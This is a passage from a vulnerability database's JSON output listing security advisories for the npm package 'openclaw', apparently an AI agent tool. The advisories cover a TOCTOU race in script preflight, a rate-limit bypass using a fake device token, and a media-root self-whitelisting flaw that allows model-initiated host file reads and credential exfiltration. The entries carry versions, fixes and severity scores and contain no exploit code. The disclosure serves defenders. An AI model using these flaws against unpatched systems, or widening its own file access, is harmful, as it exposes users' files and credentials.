                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.5"
                }
            ],
            "aliases": [
                "CVE-2026-43576",
                "GHSA-f7fh-qg34-x2xh"
            ],
            "risk_score": 3.5,
            "exploitability": "0.5",
            "weighted_severity": "6.9",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-wyce-qxau-mqff"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89271?format=api",
            "vulnerability_id": "VCID-x2ru-ydpv-f3ah",
            "summary": "OpenClaw: TOCTOU read in exec script preflight\n## Summary\n\nOpenClaw's exec script preflight validator previously validated and then read a script by mutable pathname. A local race could swap the path between validation and read, causing preflight analysis to inspect a different file identity than the one that passed the workspace boundary check.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nThe impact is limited. This was not arbitrary full-file disclosure through the preflight error path. The validator only surfaced derived preflight content, such as a matched token, a line number, or the first non-empty JavaScript line in one branch. Exploitation also required the ability to mutate the relevant workspace path during the preflight window.\n\nStill, this was a real TOCTOU boundary bug in code that is supposed to reason about workspace-local script files before execution. A file identity that passed the initial boundary validation could differ from the identity that was later read for preflight analysis.\n\n## Technical Details\n\nThe vulnerable flow performed separate path validation and file reads in `validateScriptFileForShellBleed`. Because the read was path-based, an attacker with write access to the workspace path could race replacement of the target after validation but before preflight read.\n\n## Fix\n\nPR #62333 replaced the check-then-read flow with a pinned safe-open/read path using the shared `readFileWithinRoot` helper. The fixed path performs boundary verification around the opened file identity and avoids relying on a mutable pathname for the final preflight read. Regression tests cover both pre-open and post-open swap windows.\n\n## Fix Commit(s)\n\n- `b024fae9e5df43e9b69b2daebb72be3469d52e91` (`fix(exec): replace TOCTOU check-then-read with atomic pinned-fd open in script preflight [AI]`)\n- PR: #62333\n\n## Release Process Note\n\nThe fix first shipped in `v2026.4.10`. Users should upgrade to `openclaw` `2026.4.10` or newer; the latest npm release already includes the fix.\n\n## Credits\n\nThanks to @kikayli for reporting this issue.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43529",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00011",
                            "scoring_system": "epss",
                            "scoring_elements": "0.01547",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00013",
                            "scoring_system": "epss",
                            "scoring_elements": "0.02173",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00013",
                            "scoring_system": "epss",
                            "scoring_elements": "0.02192",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43529"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "2.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/b024fae9e5df43e9b69b2daebb72be3469d52e91",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "2.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "2.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T12:18:03Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/b024fae9e5df43e9b69b2daebb72be3469d52e91"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/pull/62333",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "2.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/pull/62333"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-gj9q-8w99-mp8j",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "2.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "2.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T12:18:03Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-gj9q-8w99-mp8j"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43529",
                    "reference_id": "CVE-2026-43529",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43529"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-gj9q-8w99-mp8j",
                    "reference_id": "GHSA-gj9q-8w99-mp8j",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-gj9q-8w99-mp8j"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-time-of-check-time-of-use-toctou-race-condition-in-exec-script-preflight-validator",
                    "reference_id": "openclaw-time-of-check-time-of-use-toctou-race-condition-in-exec-script-preflight-validator",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "2.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T12:18:03Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-time-of-check-time-of-use-toctou-race-condition-in-exec-script-preflight-validator"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109896?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.10",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-6cfj-zugb-7uhq"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-h9a4-1twb-d7d1"
                        },
                        {
                            "vulnerability": "VCID-hphn-8fnj-qkh2"
                        },
                        {
                            "vulnerability": "VCID-hy24-6xpe-pkb7"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-q3a2-qk5j-1yat"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2yd-uw91-9yck"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10"
                }
            ],
            "aliases": [
                "CVE-2026-43529",
                "GHSA-gj9q-8w99-mp8j"
            ],
            "risk_score": 1.4,
            "exploitability": "0.5",
            "weighted_severity": "2.7",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-x2ru-ydpv-f3ah"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90206?format=api",
            "vulnerability_id": "VCID-x4hn-ygbg-mkep",
            "summary": "OpenClaw: Fake DeviceToken Bypasses Shared Auth Rate Limiting\n## Summary\nFake DeviceToken Bypasses Shared Auth Rate Limiting\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: low\n- Assessment: Real in the shipped mixed WS auth flow, but practical risk is mostly limited to weak shared-password deployments, since strong shared tokens remain non-bruteforceable.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `af0c0862f22ca4492406a3103d05e3628f94cbe9` — 2026-03-31T09:08:57+09:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n\nOpenClaw thanks @kexinoh of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41333",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00079",
                            "scoring_system": "epss",
                            "scoring_elements": "0.23481",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00079",
                            "scoring_system": "epss",
                            "scoring_elements": "0.23421",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00079",
                            "scoring_system": "epss",
                            "scoring_elements": "0.23468",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41333"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "3.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/af0c0862f22ca4492406a3103d05e3628f94cbe9",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "3.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T13:35:25Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/af0c0862f22ca4492406a3103d05e3628f94cbe9"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "3.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-6p8r-6m93-557f",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "3.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T13:35:25Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-6p8r-6m93-557f"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-authentication-rate-limiting-bypass-via-fake-devicetoken",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "3.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T13:35:25Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-authentication-rate-limiting-bypass-via-fake-devicetoken"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-6p8r-6m93-557f",
                    "reference_id": "GHSA-6p8r-6m93-557f",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-6p8r-6m93-557f"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.31",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"
                }
            ],
            "aliases": [
                "CVE-2026-41333",
                "GHSA-6p8r-6m93-557f"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-x4hn-ygbg-mkep"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90028?format=api",
            "vulnerability_id": "VCID-x794-wfnf-1ugf",
            "summary": "OpenClaw: Self-Whitelisting in appendLocalMediaParentRoots Allows Arbitrary File Read & Credential Exfiltration\n## Summary\nMedia Local Roots Self-Whitelisting in `appendLocalMediaParentRoots` Allows Model-Initiated Arbitrary Host File Read and Credential Exfiltration\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: v2026.3.28 still self-whitelists media parent dirs in src/media/local-roots.ts, but only after config already permits tool-fs root expansion, so the impact is narrower than the default-critical framing.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `1ca4261d7e055d0be141ed79ebb1365d0fbc7364` — 2026-03-30T17:15:03+01:00\n\nOpenClaw thanks @tdjackey for reporting.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/1ca4261d7e055d0be141ed79ebb1365d0fbc7364",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/1ca4261d7e055d0be141ed79ebb1365d0fbc7364"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-57gh-m6rq-54cf",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "7.2",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-57gh-m6rq-54cf"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-57gh-m6rq-54cf",
                    "reference_id": "GHSA-57gh-m6rq-54cf",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-57gh-m6rq-54cf"
                }
